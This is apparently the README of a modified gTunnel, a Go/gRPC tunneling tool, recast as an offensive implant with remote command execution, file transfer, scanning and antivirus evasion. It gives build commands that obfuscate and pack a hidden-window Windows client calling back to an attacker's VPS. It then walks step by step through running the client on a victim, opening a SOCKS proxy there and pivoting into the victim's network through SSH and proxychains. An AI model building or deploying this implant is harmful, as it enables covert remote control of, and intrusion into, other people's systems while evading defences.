Original (https://github.com/hotnops/gtunnel):
A TCP tunneling suite built with golang and gRPC. gTunnel can manage multiple forward and reverse tunnels that are all carried over a single TCP/HTTP2 connection. I wanted to learn a new language, so I picked go and gRPC. Client executables have been tested on windows and linux.
My changes + additions:
- Added gRPC tunnel for tasks (cmd exec / file transfer / file upload)
- High efficient TCP scanner
- Traffic stats
- AV evasion
This is the binary to be used in the VPS
cd gServer
CGO_ENABLED=0 go build .On the attacker's VPS, setup self-signed certs
mkdir tls && openssl req -new -newkey rsa:4096 -x509 -sha256 -days 365 -nodes -out tls/cert -subj "/C=/ST=/L=/O=/CN=" -keyout tls/keyx=$PWD
serverPort=443
serverIP=8.8.8.8
outputFile=gClient.exe
seed=`cat /dev/urandom| head -1 | md5sum| base64`
cd gClient && GOROOT_FINAL=/dev/null GOOS=windows GOARCH=amd64 garble -seed=$seed -tiny -literals build -ldflags "-X main.serverAddress=$serverIP -X main.serverPort=$serverPort -s -w -H=windowsgui" -o gClient.exe && cp gClient.exe $x/$outputFile && upx $x/$outputFile- Run
./gServeron the attacker's VPS as root (with permissions to open 443/tcp) - Execute
gclient.exeon the victim - Gain a new connection on the
gServerprompt - Execute
use newMachine-0000 - Execute
socks 1080to start a socks proxy on the victim machine - Execute
addtunnel local 1080 127.0.0.1 1080- you will now have a socks5 proxy at 127.0.0.1:1080 on the attack VPS - Setup SSH tunnel from attackers actual machine to get access to the socks5 port on the VPS with
ssh -L 1080:127.0.0.1:1080 root@attack_vps -N -v - Use
proxychainswith127.0.0.1 1080on the attacker's userland machine to interact with the victim's network